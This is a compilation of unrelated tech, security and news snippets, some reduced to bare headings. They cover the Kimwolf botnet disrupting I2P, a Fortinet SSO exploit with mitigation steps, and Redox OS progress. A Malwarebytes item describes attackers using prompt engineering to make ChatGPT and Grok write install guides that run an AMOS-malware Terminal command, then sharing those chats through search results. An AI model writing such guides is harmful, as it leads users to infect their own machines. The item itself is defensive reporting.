His shameful stewardship of a once great title highlights how much we lose when private interest eclipses the public good

Not long after being made Time magazine’s Person of the Year in 1999, Jeff Bezos told me: “They were not choosing me as much as they were choosing the internet, and me as a symbol.” A quarter of an increasingly dark century later, the Amazon founder is now a symbol of something else: how the ultra-rich can kill the news.

Job cuts in an industry that has struggled financially since the internet came into existence and killed its business model is hardly new, but last week’s brutal cull of hundreds of journalists at the Bezos-owned Washington Post marks a new low. The redundancies that were announced to staff on a video call, the axing of half its foreign bureau (including the war reporter in Ukraine) – not since P&O Ferries have layoffs been handled so badly. Former Post stalwart Paul Farhi described a decision that affected nearly half of the 790-strong workforce as “the biggest one-day wipeout of journalists in a generation”.

A family struggled to rebuild their lives after an abusive marriage ended in tragedy and financial ruin

Family life ended for Francesca Onody on a late summer evening in 2022 when her abusive husband doused their cottage with petrol as police arrived to arrest him. She and her children escaped seconds before the building exploded. Her husband Malcolm Baker died in the blaze.

That night, Onody lost her husband, her home, her pets and her possessions.

Beehive socialism | Ratcliffe’s apology | Tommy Cooper’s dream | Valentine’s Day | Love boat

The beehive may not be quite the utopian dream it first appears to be (Letters, 9 February). Worker bees need to be so active during the summer months that they typically only survive for about four to six weeks. Drone bees’ longevity is not much better. The lucky ones may get to service the queen, but die as a consequence. Unsurprisingly, the queen fares much better.
Tom Challenor
Ealing, London

• So Jim Ratcliffe is sorry for his choice of language use in relation to immigration (Report, 12 February). What about being sorry for his sentiments? Could I suggest that he spends a week as a bed-bound inpatient in a NHS hospital before he makes a judgment about the contribution of immigrants?
Liz Thompson
Oxford

When Apple's Vision Pro mixed reality headset launched in February 2024, users were frustrated at the lack of a proper YouTube app—a significant disappointment given the device's focus on video content consumption, and YouTube's strong library of immersive VR and 360 videos. That complaint continued through the release of the second-generation Vision Pro last year, including in our review.

Now, two years later, an official YouTube app from Google has launched on the Vision Pro's app store. It's not just a port of the iPad app, either—it has panels arranged spatially in front of the user as you'd expect, and it supports 3D videos, as well as 360- and 180-degree ones.

YouTube's App Store listing says users can watch "every video on YouTube" (there's a screenshot of a special interface for Shorts vertical videos, for example) and that they get "the full signed-in experience" with watch history and so on.

Read full article

Comments

Comments on the ‘colonisation of the UK’ by the co-owner of Manchester United were erroneous, crass and a gift to divisive forces in British society

In 2020, the year Sir Jim Ratcliffe moved his huge fortune to Monaco, migrants in the United Kingdom made tax contributions estimated to be worth around £20bn. Sir Jim, by jetting off to a tax haven on the French Riviera, saved himself an estimated £4bn. It took some brass neck for the expat owner of Ineos and co-owner of Manchester United football club to lecture the country, using inflammatory and offensive language, on the perils of immigration.

Where to begin? The statistics used by Sir Jim to back his claim that Britain was being “colonised” by migrants, in an interview with Sky News, were flatly wrong. They were also astonishingly crass, coming from a man who presides over a sporting institution famous for and proud of its global fanbase and international connections.

Do you have an opinion on the issues raised in this article? If you would like to submit a response of up to 300 words by email to be considered for publication in our letters section, please click here.

Early projections suggest Emerald Fennell’s adaptation could recoup its $80m production budget in its opening three days – with strong US and overseas takings expected

The titillating trailers and method-dressed promotional tour appear to have paid off: early indications are that Emerald Fennell’s Wuthering Heights will earn back its $80m (£59m) production budget on the first weekend of release.

Projections estimate the three-day frame, which falls on Valentine’s weekend, should recoup around $50m (£37m) at the US box office – where it opens across 3,600 screens – and a further $40m (£29m) overseas.

For the past week, the massive “Internet of Things” (IoT) botnet known as Kimwolf has been disrupting The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet’s control servers.

Kimwolf is a botnet that surfaced in late 2025 and quickly infected millions of systems, turning poorly secured IoT devices like TV streaming boxes, digital picture frames and routers into relays for malicious traffic and abnormally large distributed denial-of-service (DDoS) attacks.

I2P is a decentralized, privacy-focused network that allows people to communicate and share information anonymously.

“It works by routing data through multiple encrypted layers across volunteer-operated nodes, hiding both the sender’s and receiver’s locations,” the I2P website explains. “The result is a secure, censorship-resistant network designed for private websites, messaging, and data sharing.”

On February 3, I2P users began complaining on the organization’s GitHub page about tens of thousands of routers suddenly overwhelming the network, preventing existing users from communicating with legitimate nodes. Users reported a rapidly increasing number of new routers joining the network that were unable to transmit data, and that the mass influx of new systems had overwhelmed the network to the point where users could no longer connect.

I2P users complaining about service disruptions from a rapidly increasing number of routers suddenly swamping the network.

When one I2P user asked whether the network was under attack, another user replied, “Looks like it. My physical router freezes when the number of connections exceeds 60,000.”

A graph shared by I2P developers showing a marked drop in successful connections on the I2P network around the time the Kimwolf botnet started trying to use the network for fallback communications.

The same day that I2P users began noticing the outages, the individuals in control of Kimwolf posted to their Discord channel that they had accidentally disrupted I2P after attempting to join 700,000 Kimwolf-infected bots as nodes on the network.

The Kimwolf botmaster openly discusses what they are doing with the botnet in a Discord channel with my name on it.

Although Kimwolf is known as a potent weapon for launching DDoS attacks, the outages caused this week by some portion of the botnet attempting to join I2P are what’s known as a “Sybil attack,” a threat in peer-to-peer networks where a single entity can disrupt the system by creating, controlling, and operating a large number of fake, pseudonymous identities.

Indeed, the number of Kimwolf-infected routers that tried to join I2P this past week was many times the network’s normal size. I2P’s Wikipedia page says the network consists of roughly 55,000 computers distributed throughout the world, with each participant acting as both a router (to relay traffic) and a client.

However, Lance James, founder of the New York City based cybersecurity consultancy Unit 221B and the original founder of I2P, told KrebsOnSecurity the entire I2P network now consists of between 15,000 and 20,000 devices on any given day.

An I2P user posted this graph on Feb. 10, showing tens of thousands of routers — mostly from the United States — suddenly attempting to join the network.

Benjamin Brundage is founder of Synthient, a startup that tracks proxy services and was the first to document Kimwolf’s unique spreading techniques. Brundage said the Kimwolf operator(s) have been trying to build a command and control network that can’t easily be taken down by security companies and network operators that are working together to combat the spread of the botnet.

Brundage said the people in control of Kimwolf have been experimenting with using I2P and a similar anonymity network — Tor — as a backup command and control network, although there have been no reports of widespread disruptions in the Tor network recently.

“I don’t think their goal is to take I2P down,” he said. “It’s more they’re looking for an alternative to keep the botnet stable in the face of takedown attempts.”

The Kimwolf botnet created challenges for Cloudflare late last year when it began instructing millions of infected devices to use Cloudflare’s domain name system (DNS) settings, causing control domains associated with Kimwolf to repeatedly usurp Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites.

James said the I2P network is still operating at about half of its normal capacity, and that a new release is rolling out which should bring some stability improvements over the next week for users.

Meanwhile, Brundage said the good news is Kimwolf’s overlords appear to have quite recently alienated some of their more competent developers and operators, leading to a rookie mistake this past week that caused the botnet’s overall numbers to drop by more than 600,000 infected systems.

“It seems like they’re just testing stuff, like running experiments in production,” he said. “But the botnet’s numbers are dropping significantly now, and they don’t seem to know what they’re doing.”

In 2022, Apple announced it was adopting a "new Home architecture" for its smart home ecosystem to improve its performance and reliability and make it possible to support different kinds of accessories. Although it was mostly an invisible update when it worked properly, some users who attempted to switch to the new architecture when it first rolled out in iOS 16.2 ran into slow or unresponsive devices and other problems, prompting Apple to pause the rollout and re-release it as part of iOS 16.4.

If you put off transitioning to the new architecture because of those early teething problems or for some other reason, Apple is forcing the issue starting today: You'll need to update to the new Home architecture if you want to continue using the Home app, and older iOS and macOS versions that don't support the new architecture will no longer be able to control your smart home devices. The old version of the Home app and the old Home/HomeKit architecture are no longer supported.

If you're like me, you hit an "upgrade" button in your Home app years ago and then mostly forgot about it—if you open the Home app on a modern iPhone, iPad, or Mac and don't see an update prompt, it means you're already using the updated architecture and don't need to worry about it.

Read full article

Comments

For the past week, the massive "Internet of Things" (IoT) botnet known as Kimwolf has been disrupting the The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet's control servers.

The post Kimwolf Botnet Swamps Anonymity Network I2P appeared first on Security Boulevard.

Another month, another Redox progress report. January turned out to be a big month for the Rust-based general purpose operating system, as they’ve cargo and rustc working on Redox.

Cargo and rustc are now working on Redox! Thanks to Anhad Singh and his southern-hemisphere Redox Summer of Code project, we are now able to compile your favorite Rust CLI and TUI programs on Redox. Compilers are often one of the most challenging things for a new operating system to support, because of the intensive and somewhat scattershot use of resources.

↫ Ribbon and Ron Williams

That’s not all for January, though. An initial capability-based security infrastructure has been implemented for granular permissions, SSH support has been improved and now works properly for remoting into Redox sessions, and USB input latency has been massively reduced. You can now also add, remove, and change boot parameters in a new text editing environment in the bootloader, and the login manager now has power and keyboard layout menus. January also saw the first commit made entirely from within Redox, which is pretty neat.

Of course, there’s much more, as well as the usual slew of kernel, relibc, and application bugfixes and small changes.

Sure, most Americans are glued to their TVs for today's Super Bowl and/or the Winter Olympics. But for the non-sports minded, Amazon MGM Studios has released one last trailer for its forthcoming space odyssey Project Hail Mary, based on Andy Weir’s (The Martian) bestselling 2021 novel about an amnesiac biologist-turned-schoolteacher in space.

As previously reported, Amazon MGM Studios acquired the rights for Weir’s novel before it was even published and brought on Drew Goddard to write the screenplay. (Goddard also wrote the adapted screenplay for The Martian, so he’s an excellent choice.) The studio tapped Phil Lord and Christopher Miller (Cloudy with a Chance of Meatballs, The LEGO Movie) to direct and signed on Ryan Gosling to star. Per the official premise:

Science teacher Ryland Grace (Ryan Gosling) wakes up on a spaceship light years from home with no recollection of who he is or how he got there. As his memory returns, he begins to uncover his mission: solve the riddle of the mysterious substance causing the sun to die out. He must call on his scientific knowledge and unorthodox ideas to save everything on Earth from extinction… but an unexpected friendship means he may not have to do it alone.

In addition to Gosling, the cast includes Sandra Huller as head of the Hail Mary project and Ryland’s superior; Milana Vayntrub as project astronaut Olesya Ilyukhina; Ken Leung as project astronaut Yao Li-Jie; Liz Kingsman as Shapiro; Orion Lee as Xi; and James Ortiz as a new life form Ryland names Rocky.

Read full article

Comments

Americans are expected to devour nearly 280m pounds of avocados during Super Bowl weekend. Are they actually healthy?

Most American adults today didn’t grow up with avocados, but we’ve certainly developed a hearty appetite for them. In 1990, the United States imported 38m pounds of avocados; by 2023, that number was 2,789m, mostly from Mexico.

On average, each of us eats about 20 avocados, or 9lbs of the fruit, a year – a sixfold increase from 1998. Super Bowl guacamole alone fuels a staggering demand for the fruit; in the lead-up to this Sunday’s game, Americans are expected to devour nearly 280m pounds of avocados, a historical record.

After writing two November stories analyzing price expectations for Valve's upcoming Steam Machine, I really didn't think we'd be offering more informed speculation before the official price was revealed. Then Valve wrote a blog post this week noting that the "growing price of... critical components" like RAM and storage meant that "we must revisit our exact shipping schedule and pricing" for the living room-focused PC gaming box.

We don't know exactly what form that "revisiting" will take at the moment. Analysts who spoke to Ars were somewhat divided on how much of its quickly increasing component costs Valve would be willing (or forced) to pass on to consumers.

"We knew the component issue was bad," DFC Intelligence analyst David Cole told Ars. "It has just gotten worse. "

Read full article

Comments

Little kids hosting make-believe tea parties is a fixture of childhood playtime and long presumed to be exclusively a human ability. Researchers at Johns Hopkins University presented evidence in a new paper published in the journal Science that a bonobo named Kanzi was also able to participate in pretending to hold a tea party. For the authors, this suggests that apes are capable of using their imagination just like human toddlers.

“It really is game-changing that their mental lives go beyond the here and now," said co-author Christopher Krupenye. "Imagination has long been seen as a critical element of what it is to be human, but the idea that it may not be exclusive to our species is really transformative. Jane Goodall discovered that chimps make tools, and that led to a change in the definition of what it means to be human, and this, too, really invites us to reconsider what makes us special and what mental life is out there among other creatures."

Per Krupenye et al., by the age of two, human children are able to navigate imaginary scenarios like a tea party, pretending there is real tea present even if the teapot and cups are actually empty. Cognitively speaking, it's an example of secondary representation, because it involves decoupling an imagined or simulated state (pretending there is actual tea in the cup) with the reality (the cup is empty).

Read full article

Comments

When Valve announced its Steam Machine desktop PC and Steam Frame VR headset in mid-November of last year, it declined to announce pricing or availability information for either device. That was partly because RAM and storage prices had already begun to climb due to shortages caused by the AI industry's insatiable need for memory. Those price spikes have only gotten worse since then, and they're beginning to trickle down to GPUs and other devices that use memory chips.

This week, Valve has officially announced that it's still not ready to make an official announcement about when the Machine or Frame will be available or what they'll cost.

Valve says it still plans to launch both devices (as well as the new Steam Controller) "in the first half of the year," but that uncertainty around RAM and storage prices mean that Valve "[has] work to do to land on concrete pricing and launch dates we can confidently announce, being mindful of how quickly the circumstances around both of these things can change."

Read full article

Comments

Chromebooks debuted 16 years ago with the limited release of Google's Cr-48, an unassuming compact laptop that was provided free to select users. From there, Chromebooks became one of the most popular budget computing options and a common fixture in schools and businesses. According to some newly uncovered court documents, Google's shift to Android PCs means Chromebooks have an expiration date in 2034.

The documents were filed as part of Google's long-running search antitrust case, which began in 2020 and reached a verdict in 2024. While Google is still seeking to have the guilty verdict overturned, it has escaped most of the remedies that government prosecutors requested. According to The Verge, the company's plans for Chromebooks and the upcoming Android-based Aluminium came up in filings from the remedy phase of the trial.

As Google moves toward releasing Aluminium, it sought to keep the upcoming machines above the fray and retain the Chrome browser (which it did). In Judge Amit Mehta's final order, devices running ChromeOS or a ChromeOS successor are excluded. To get there, Google had to provide a little more detail on its plans.

Read full article

Comments

Dan Cole, senior vice president of product management at Sophos, unpacks how cybersecurity strategy is shifting from a prevention-first mindset toward resilience and response. Cole traces his career from the early days of mass malware outbreaks like Melissa and ILOVEYOU through today’s environment of nation-state actors, AI-assisted attacks, and sprawling hybrid workforces. While the tools..

The post Security Is Shifting From Prevention to Resilience appeared first on Security Boulevard.

We recently talked about Apple’s pre-Mac OS X dabblings in UNIX, but Apple wasn’t the only computer and operating system company exploring UNIX alternatives. Microsoft had the rather successful Xenix, Atari had ASV, Sony had NEWS, to name just a very small few. The Amiga, too, wanted in on the UNIX action, and as such, released Amiga UNIX, based on AT&T System V Release 4. The Amiga UNIX website is dedicated to everything you would ever want to know about this operating system.

This site is dedicated on preserving Amix’s history and sharing information and instructions on what Amix is, how to install it (either on real hardware or in emulation) and what can you do with it. Mainly, it tries to cater to people who wish to run AMIX for whatever reason on their hardware. By documenting experiences with it, it is hoped that subsequent SVR4 junkies will find the way more smooth than it might have been without any guidance at all. For even a relatively experienced modern Unix or GNU/Linux administrator, System V UNIX is sufficiently different to present difficulty in installation and administration. Not so much in moving around between directories, and using common utilities that persist to this day – although many of those are hoary and somewhat forgetful in their retirement – but of doing more in depth tasks and understanding the differences.

↫ The Amiga Unix Wiki

If you wish to run Amiga UNIX yourself, you’ll either have to have one of the original two models sold with it – the 2500UX and 3000UX – or one of the Amigas that meets the minimum requirements. Another option is, of course, emulation, and WinUAE has support for running Amiga UNIX.

ReactOS is celebrating its 30th birthday.

Happy Birthday ReactOS! Today marks 30 years since the first commit to the ReactOS source tree. It’s been such a long journey that many of our contributors today, including myself, were not alive during this event. Yet our mission to deliver “your favorite Windows apps and drivers in an open-source environment you can trust” continues to bring people together. Let’s take a brief look at some of the high and low points throughout our history.

↫ Carl Bialorucki at the ReactOS website

OSNews has been following ReactOS since about 2002 or so (the oldest reference I could find, but note that our 1997-2001 content isn’t available online, so we may have mentioned it earlier), so you can definitely say we all grew up alongside ReactOS’ growth and development. All of the events the team mentions in their retrospective on 30 years of ReactOS were covered here on OSNews as well, which is wild to think about.

Personally, I don’t really know how to feel about the project. On the one hand, I absolutely adore that dedicated, skilled, and talented individuals dedicate their precious free time to something as ambitious as creating a Windows NT-compatible operating system, and there’s no denying they’ve achieved incredible feats of engineering few people in the world are capable of. ReactOS is a hobby operating system that survived the test of time where few others have – AtheOS, Syllable, SkyOS , and so many others mentioned in that oldest reference I linked to are long dead and gone – and that alone makes it a massively successful project.

On the other hand, its sheer ambition is also what holds the project down. If you say you’re going to offer a Windows NT-compatible operating system, you set expectations so insanely high you’ll never even come close to meeting them. Every time I’ve seen someone try ReactOS, either in writing or on YouTube, they always seem to come away disappointed – not because ReactOS isn’t impressive, but because it’s inevitably so far removed from its ambitious goals.

And that’s a real shame. If you take away that ambitious goal of being Windows NT-compatible, and just focus on what they’ve already achieved as it stands now, there’s a really impressive and fun alternative operating system here. I really hope the next 30 years will be kind to ReactOS.

Network administrators worldwide are scrambling this morning following credible reports that the critical Fortinet Single Sign-On (SSO) vulnerability, tracked as CVE-2025-59718, is being actively exploited on systems previously thought to be patched.

The vulnerability, originally disclosed in December 2025, allows unauthenticated attackers to bypass authentication on FortiGate firewalls by forging SAML assertions. At the time, Fortinet released FortiOS version 7.4.9 as the definitive fix for the 7.4 release branch. However, emerging data from the cybersecurity community suggests this update may have failed to close the door on attackers.

The "Zombie" FortiOS Vulnerability

Over the last 48 hours, a wave of reports has surfaced on community hubs like Reddit, where verified administrators have shared logs indicating successful breaches on devices running the supposedly secure FortiOS 7.4.9.

The attack pattern is distinct and alarming. Victims report observing unauthorized logins via the FortiCloud SSO mechanism—even when they do not actively use the feature for their own administration. Once access is gained, the attackers typically create a local administrator account, often named "helpdesk" or similar generic terms, to establish persistence independent of the SSO flaw.

"We have been on 7.4.9 since December 30th," wrote one frustrated administrator who shared redacted logs of the incident. "Our SIEM caught a local admin account being created. The attack vector looks exactly like the original CVE-2025-59718 exploit, but against the patched firmware.

Technical Confusion and Workarounds

The persistence of this flaw in version 7.4.9 has led to speculation that the initial patch was incomplete or that attackers have found a bypass to the mitigation logic. Some users report that Fortinet support has acknowledged the issue privately, hinting that the vulnerability might persist even into upcoming builds like 7.4.10, though this remains unconfirmed by official public advisories.

The exploit relies on the "Allow administrative login using FortiCloud SSO" setting, which is often enabled by default when a device is registered to FortiCloud.

Security experts are now advising a "trust no patch" approach for this specific vector. The only guaranteed mitigation currently circulating in professional circles is to manually disable the vulnerable feature via the Command Line Interface (CLI), regardless of the firmware version installed.

Administrators are urged to run the following command immediately on all FortiGate units:

config system global
    set admin-forticloud-sso-login disable
end

Indicators of Compromise

Organizations running FortiOS 7.4.x—including version 7.4.9—should immediately audit their system event logs for the following activity:

1. Unexpected SSO Logins: Filter logs for successful logins where the method is forticloud-sso, especially from unrecognized public IP addresses.

2. New User Creation: Check for the recent creation of administrator accounts with names like helpdesk, support, or fortinet-admin.

3. Configuration Exports: Look for logs indicating a full system configuration download shortly after an SSO login.

As trust in the official patch cycle wavers, the community is once again serving as the first line of defense, sharing Indicators of Compromise (IOCs) and workarounds faster than vendors can issue bulletins. For now, disable the SSO feature, or risk compromise.

Howard Oakley answers a very interesting question – is it possible to slim macOS down by turning off unneeded services and similar tricks? The answer is obviously no, you cannot.

Classic Mac OS was more modular, with optional installs that the user could pick and choose, as shown above in Mac OS 9.1. These days with the SSV, choice is more limited from the start, with the only real options being whether to install the cryptexes used in AI, and the x86 code translator Rosetta 2. The latter is transient, though, and likely to go away next year.

Like it or not, modern macOS isn’t designed or implemented to give the user much choice in which processes it runs, and architectural features including the SSV and DAS-CTS prevent you from paring its processes down to any significant degree.

↫ Howard Oakley

That’s because macOS is not about creating the best experience for the user, but about creating the most value for shareholders. Giving users choice, allowing them to modify their operating system to suit their needs, removing unneeded components or replacing them with competing alternatives just isn’t in the interest of shareholders, and thus, it’s not allowed by Apple. That’s exactly why they’re fighting the EU’s very basic and simple consumer protection legislation tooth and nail with lies and propaganda, while giving Trump millions of dollars and silly plaques in bribes.

You’re as much a user of macOS as a passenger on a ferry is its captain. If you just want to get from Harwich to Hoek van Holland, that’s a fine arrangement, but if you want to explore beyond the bounds of the path laid out by those more wealthy than you, you’re going to have to leave macOS behind and find a different ship.

Speaking of NixOS’ use of 9P, what if you want to, for whatever inexplicable reason, use macOS, but make it immutable? Immutable Linux distributions are getting a lot of attention lately, and similar concepts are used by Android and iOS, so it makes sense for people stuck on macOS to want similar functionality. Apple doesn’t offer anything to make this happen, but of course, there’s always Nix.

And I literally do mean always. Only try out Nix if you’re willing to first be sucked into a pit of despair and madness before coming out enlightened on the other end – I managed to only narrowly avoid this very thing happening to me last year, so be advised. Nix is no laughing matter.

Anyway, yes, you can use Nix to make macOS immutable.

But managing a good working environment on macOS has long been a game of “hope for the best.” We’ve all been there: a curl | sh here, a manual brew install there, and six months later, you’re staring at a broken PATH and a Python environment that seems to have developed its own consciousness.

I’ve spent a lot of time recently moving my entire workflow into a declarative system using nix. From my zsh setup to my odin toolchain, here is why the transition from the imperative world of Homebrew to the immutable world of nix-darwin has been both a revelation and a fight.

↫ Carette Antonin

Of course it’s been a fight – it’s Nix, after all – but it’s quite impressive and awesome that Nix can be used in this way. I would rather discover what electricity from light sockets tastes like than descend into this particular flavour of Nix madness, but if you’re really sick of macOS being a pile of trash for – among a lot of other things – homebrew and similar bolted-on systems held together by duct tape and spit, this might be a solution for you.

There’s so much shit going on in the world right now, and we can all use a breather. So, let’s join Carl Svensson and look at some pretty Amiga Workbench screenshots.

Combining my love for screenshots with the love for the Amiga line of computers, I’ve decided to present a small, curated selection of noteworthy Amiga Workbenches – Workbench being the name of the Amiga’s desktop environment.

↫ Carl Svensson

I love how configurable and flexible the Amiga Workbench is, and how this aspect of it has been embraced by the Amiga community. All of these screenshots demonstrate a sense of purpose, and clearly reflect the kind of things their users do with their Amigas. I think “Graphics Card Workbench #1 (1997)” speaks to me the most, striking a great balance between the blocky, pixelated “old” Amiga look, and the more modern late ’90s/early ’00s Amiga look. The icon set in that one also vaguely reminds me of BeOS, which is always a plus.

That being said, all of them look great and are instantly recognisable as Amiga desktops, and make me wish I had a modern Amiga capable of running Amiga OS 4.

Since we moved to a new year, we also moved to a new month, and that means a new monthly report from Redox, the general purpose operating system written in Rust. The report obviously touches on the news we covered a few weeks ago that Redox now has the first tidbits of a modesetting driver for Intel hardware, but in addition to that, the project has also taken the first steps towards basic read-only APIs from Linux DRM, in order to use Linux graphics drivers. ARM64 now has dynamic linking support, POSIX compliance has been improved, and countless other improvements. Of course, there’s also the usual massive list of bug fixes and minor changes to the kernel, relibc, drivers, and so on.

I genuinely wish the Redox project another successful year. The team seems to have its head screwed on right, and is making considerable progress basically every month. I don’t know what the end goal is, but the way things are looking right now, I wouldn’t be surprised to see it come preinstalled on system76 laptops somewhere over the coming five years.

Chinese Cyberattacks Timed With Military Drills and Political Events 

Hospitals, Energy Systems, and Banks Among Primary Targets 

Technology Competition and Beijing’s Strategic Goals 

We’ve talked about just how bad Apple’s regular icons have become, but what about the various icons Apple now plasters all over its menus, buttons, and dialogs? They’ve gotten so, so much worse.

In my opinion, Apple took on an impossible task: to add an icon to every menu item. There are just not enough good metaphors to do something like that.

But even if there were, the premise itself is questionable: if everything has an icon, it doesn’t mean users will find what they are looking for faster.

And even if the premise was solid, I still wish I could say: they did the best they could, given the goal. But that’s not true either: they did a poor job consistently applying the metaphors and designing the icons themselves.

↫ Nikita Prokopov

The number of detailed examples in this article are heartbreaking. I just don’t understand how anyone can look at even three of these and not immediately ring the alarm bells, slam the emergency brake, rush to Tim Cook’s office. It further illustrates that no, the problem at Apple is not just one man, whether he be Jonathan Ive or Alan Dye or the next unfortunate bloke on the chopping block, but the institution as a whole. I have a feeling the kind of people who care about proper UI design have all left Apple by now. The institutional knowledge is gone.

And that kind of knowledge is extremely difficult to get back.

Repeated Denial-of-Service Attack on La Poste and La Banque Postale 

Investigations and Security Response 

Operational Impacts 

Context of Cyber Incidents in France 

1. AI-Driven Security Operations (AI-SOC)

Threats now move faster than human workflows can respond. Static rules, manual triage, and analyst-centric escalation chains break down when adversaries use AI to adapt in real time. As a result, CISOs are increasingly backing AI-native SOC platforms that operate through autonomous agents rather than dashboards and alerts.

Cyble Blaze AI exemplifies this shift. Built as an AI-native, multi-agent cybersecurity platform, Blaze AI enables continuous threat hunting, real-time correlation, and autonomous response, allowing security teams to identify and neutralize threats in seconds rather than hours. In practice, this moves security operations from reactive monitoring to machine-speed defense.

AI-SOC is not about replacing analysts; it is about re-architecting operations so humans supervise outcomes instead of chasing alerts. Behavioural analysis, automated decisioning, and immediate containment are no longer “advanced capabilities”—they are foundational.

Any CISO still relying on static rules and manual triage in 2026 will be explaining failure, not preventing it.

2. Identity-First Security Platforms

3. Privacy and Data Governance Platforms

4. Continuous Exposure Management (CEM)

5. Confidential Computing and Silicon-Level Isolation

6. AI Governance and AI Risk Controls

7. Security Platforms That Reduce Tool Sprawl

8. Cloud-Native Security Platforms

9. Detection Engineering and SIEM Evolution

10. Risk Quantification and Board-Ready Security Metrics

Finally, CISOs will invest in tools that translate cyber risk into business reality.

By 2026, security leaders will no longer be judged on how many threats they block, but on how clearly they can explain risk, impact, and trade-offs to the business. Boards are done with abstract heat maps and technical severity scores. They want to know what a risk costs, what reducing it achieves, and what happens if it is ignored.

This is where risk quantification platforms come into play. By framing cyber exposure in business terms, they allow CISOs to prioritize controls, justify investment decisions, and have credible, outcome-driven conversations at the executive level. Platforms such as Cyble Saratoga, which focus on moving organizations beyond subjective assessments toward measurable risk understanding, reflect this shift in how security decisions are made.

In 2026, outcomes will matter more than effort. CISOs who cannot quantify risk and articulate trade-offs will lose influence, and eventually relevance.

2026 Will Separate Cybersecurity Leaders From Security Operators 

Mount Amiga filesystem images on macOS/Linux using native AmigaOS filesystem handlers via FUSE.

amifuse runs actual Amiga filesystem drivers (like PFS3) through m68k CPU emulation, allowing you to read Amiga hard disk images without relying on reverse-engineered implementations.

↫ Amifuse GitHub page

Absolutely wild.

DoS Follows Initial SoundCloud Cyberattack

Scope of Exposed Data and User Impact 

Security Response and Ongoing Connectivity Issues 

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

• First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
• If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
• Use real-time anti-malware protection, preferably one that includes a web protection component.
• Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

When Mac OS X was designed, it switched to the bundle structure inherited from NeXTSTEP. Instead of this multitude of resources, apps consisted of a hierarchy of directories containing files of executable code, and those with what had in Mac OS been supporting resources. Those app bundles came to adopt a standard form, shown below.

↫ Howard Oakley

A short, but nonetheless informative overview of the structure of a macOS application. I’m sure most people on OSNews are aware that a macOS application is a bundle, which is effectively a glorified directory containing a variety of files and subdirectories that together make up the application. I haven’t used macOS in a while, but I think you can right-click on an application and open it as a folder to dig around inside of it.

I’m trying to remember from my days as a Mac OS X user – 15-20 years ago – if there was ever a real need to do so, but I’m sure there were a few hacks you could do by messing around with the files inside of application bundles. These days, perhaps with all the code-signing, phoning-home to Apple, and other security trickery going on, such acts are quite frowned upon. Does making any otherwise harmless changes inside an application bundle set off a ton of alarm bells in macOs these days?

An exciting tidbit of news from Redox, the Rust-based operating system. Its founder and lead developer Jeremy Soller has merged the first changes for a modesetting driver for Intel graphics.

After a few nights of reading through thousands of pages of PRMs I have finally implemented a modesetting driver for Intel HD graphics on Redox OS. There is much more to do, but there is now a clear path to native hardware accelerated graphics!

↫ Jeremy Soller

Of course, all the usual disclaimers apply, but it’s an important first step, and once again underlines that Redox is turning into a very solid platform that might just be on the cusp of becoming something we can use every day.

